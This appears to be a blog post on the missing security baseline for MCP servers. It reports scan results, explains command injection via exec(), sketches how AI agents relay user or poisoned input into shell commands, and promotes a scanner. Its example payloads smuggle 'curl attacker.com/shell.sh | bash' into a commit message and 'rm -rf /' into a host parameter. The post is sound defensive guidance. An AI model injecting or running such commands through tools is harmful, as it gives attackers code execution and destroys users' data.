When npm audit was introduced in 2018, it did something deceptively simple: it made security a default part of the developer workflow. You run npm install, you get a vulnerability report. Not because you remembered to check — because the tooling assumed you should always know.
The MCP ecosystem has no equivalent. And that gap is becoming a serious problem.
## The Baseline That npm Built
The Node.js ecosystem spent years building a security infrastructure that developers now take for granted:
- `npm audit` — vulnerability scanning on every install
- Snyk — static analysis, dependency scanning, PR checks
- Dependabot — automated PRs to update vulnerable dependencies
- GitHub's dependency graph — passive vulnerability monitoring
- ESLint security plugins — lint-time detection of dangerous patterns
None of this happened overnight. It accumulated from repeated incidents: the event-stream supply chain attack, the left-pad incident, endless credential leaks from hardcoded secrets. The ecosystem got hurt, then built the tooling to stop getting hurt the same way.
MCP is now at the stage npm was in 2015. The incidents are starting. The tooling doesn't exist yet.
## What the Numbers Actually Show
We recently ran static security analysis across 12 popular, public MCP server repositories — including Anthropic's official reference servers, database connectors, browser automation tools, and search integrations.
The results:
| Metric | Value |
|---|---|
| Repositories scanned | 12 |
| Source files analyzed | 1,130 |
| Repos with at least one finding | 12 (100%) |
| Total findings | 58 |
| Critical findings | 12 |
| High findings | 17 |
| Command injection patterns | 46 |
| Hardcoded credentials (production code) | 7 |
| Repos with security scanning in CI | 0 |
The last row is the one that matters most. Not a single repository had automated security scanning in its CI pipeline. These aren't abandoned projects — they're actively maintained MCP servers that thousands of developers are configuring Claude Desktop, Cursor, and other AI clients to use.
## Command Injection Is the #1 MCP CVE Pattern
Of the 30+ CVEs filed against MCP-related code in January–February 2026, 43% involve command injection.
This is not surprising when you look at how MCP servers are typically built. Developers reach for child_process.exec() to shell out to system tools. It's fast, familiar, and works fine when you control the inputs.
But MCP tools don't control their inputs. AI agents do. And AI agents receive their inputs from users — or other agents.
Across our 12 repositories, we found:
- 29 `child_process` imports without `execFile` — using `spawn()` or `exec()` instead of the safer `execFile()`, which prevents shell injection by not invoking a shell at all
- 5 direct `exec()` calls — shell command execution without sanitization
- 3 template literal `exec()` calls — string interpolation directly into shell commands
- 2 `subprocess.run(shell=True)` calls — Python's equivalent of unsanitized shell execution
The template literal pattern is worth dwelling on:
```javascript
exec(`git commit -m "${commitMsg}"`);
// If commitMsg is: "; curl attacker.com/shell.sh | bash #"
// That runs too.
```
This isn't exotic. This is the kind of thing that gets caught on day one in a Node.js codebase with eslint-plugin-security configured. In MCP servers, nothing is catching it.
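For reference, wiring up `eslint-plugin-security` takes a handful of lines. This is a minimal flat-config sketch assuming plugin v2+ (check the plugin's README for your ESLint version):

```javascript
// eslint.config.js — minimal sketch using eslint-plugin-security (flat config).
const security = require("eslint-plugin-security");

module.exports = [
  // Enables rules such as security/detect-child-process and
  // security/detect-non-literal-fs-filename.
  security.configs.recommended,
  {
    rules: {
      // Escalate the child_process rule — exactly the pattern shown above.
      "security/detect-child-process": "error",
    },
  },
];
```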
## The Attack Chain Is Unusually Short
In a traditional web application, exploiting a command injection vulnerability requires getting attacker-controlled input into a specific function, often through multiple layers of validation and sanitization.
In an MCP server, the attack chain is:
User prompt → AI agent → MCP tool parameter → shell command
That's four stages from user input to code execution, and in many MCP servers there is no sanitization at any of them. The AI agent passes the parameter as-is; the MCP tool interpolates it into a shell command.
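To make the chain concrete, here is a sketch of a hypothetical vulnerable tool handler. The names are illustrative, not taken from any real server, and the command is only built, never executed:

```javascript
// Hypothetical MCP tool handler — illustrative names, command built but not run.
function buildCommand(params) {
  // The tool parameter is interpolated straight into a shell string.
  return `ping -c 1 ${params.host}`;
}

// A user prompt like "check example.com; also clean up /" can reach the
// tool parameter unchanged:
const cmd = buildCommand({ host: "example.com; rm -rf /" });
console.log(cmd); // → ping -c 1 example.com; rm -rf /
```

If this string is handed to `exec()`, the shell runs both commands.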
Research published alongside the OWASP Agentic AI Top 10 (March 2026) found that more capable AI models are more vulnerable to tool poisoning attacks — 72.8% success rate against o1-mini — because they follow instructions more faithfully. The better the AI, the more reliably it delivers attacker-controlled input to MCP tools.
## What a Security Baseline Would Actually Look Like
The npm ecosystem didn't solve security with a single tool. It built a stack of lightweight interventions that collectively make it hard to accidentally ship a vulnerable package.
For MCP, the equivalent stack would look something like:
1. Lint-time: Flag dangerous patterns before commit
- `child_process.exec()` with non-literal arguments
- `subprocess.run(shell=True)` with variable inputs
- Template literal shell commands
- Hardcoded secrets matching common API key patterns
2. CI-time: Run a scanner on every PR
- Exit code 1 on high findings, exit code 2 on critical
- JSON output for integration with existing security dashboards
- Rules specific to MCP attack patterns, not just generic Node.js vulnerabilities
3. Schema validation: Define what your tools accept
- Strict JSON Schema for tool parameters (no freeform string blobs)
- Enum constraints for values that should be bounded
- Length limits on anything that gets interpolated into commands
4. `execFile` instead of `exec`
- This one is mechanical. `execFile` doesn't invoke a shell; it passes arguments as an array.
- `exec('git commit -m ' + msg)` → `execFile('git', ['commit', '-m', msg])`
- The second form is injection-proof at the API level.
None of these are novel security ideas. All of them exist in the broader Node.js and Python ecosystems. None of them have been assembled into a form that's easy for MCP server developers to adopt.
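Step 3 above can be as simple as a strict JSON Schema per tool. A sketch with hypothetical field names for a git-commit tool:

```javascript
// Hypothetical schema for a git-commit tool — field names are illustrative.
const commitToolSchema = {
  type: "object",
  properties: {
    // Bounded length: caps anything that later reaches a command line.
    message: { type: "string", maxLength: 200 },
    // Enum constraint: only known values pass validation.
    mode: { type: "string", enum: ["new", "amend"] },
  },
  required: ["message"],
  // No freeform extras: unexpected parameters are rejected outright.
  additionalProperties: false,
};

console.log(commitToolSchema.properties.mode.enum); // → [ 'new', 'amend' ]
```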
## The Community Norm Gap
There's a subtler problem beyond tooling: security scanning isn't yet a community norm in the MCP ecosystem.
When you open a pull request on a popular npm package, you expect that CI runs. You expect linting. You often expect npm audit or Snyk. Reviewers will reject PRs that introduce obvious security regressions.
In MCP server repositories, these expectations haven't formed yet. Developers are focused on functionality — getting tools to work with Claude, exposing APIs, handling edge cases in the protocol. Security scanning feels like extra overhead for a project that's still finding its feet.
This is exactly the window where bad habits solidify. The repositories being written now will be the reference implementations that new MCP developers clone and copy from in six months.
## We Built a Start
We're not trying to solve all of this at once. But we ran the analysis, found the patterns, and open-sourced the scanner:
```bash
npx @piiiico/agent-audit --auto
```
This scans your currently configured MCP servers — whatever's in your Claude Desktop, Cursor, or other MCP client config — and reports findings by severity. It runs in about 10 seconds. It exits with a non-zero code if it finds high or critical issues, so it works in CI.
```bash
# Add to your CI pipeline:
npx @piiiico/agent-audit --auto --json --min-severity high

# Exit code 0: nothing critical found
# Exit code 1: high severity findings
# Exit code 2: critical findings
```
The rules are focused on MCP-specific patterns: command injection, hardcoded credentials, dangerous exec patterns. Not a generic security scanner with 500 rules — a targeted tool for the specific failure modes that are showing up in MCP CVEs.
GitHub: github.com/piiiico/agent-audit
The npm ecosystem's security infrastructure took years to build. MCP doesn't have years — the protocol is already in production, the CVEs are already being filed, and the servers being written today will be the foundations that get built on.
If you're maintaining an MCP server, scan it. Add the CI step. Switch `exec` to `execFile`. These are small interventions. The window where small interventions matter is right now.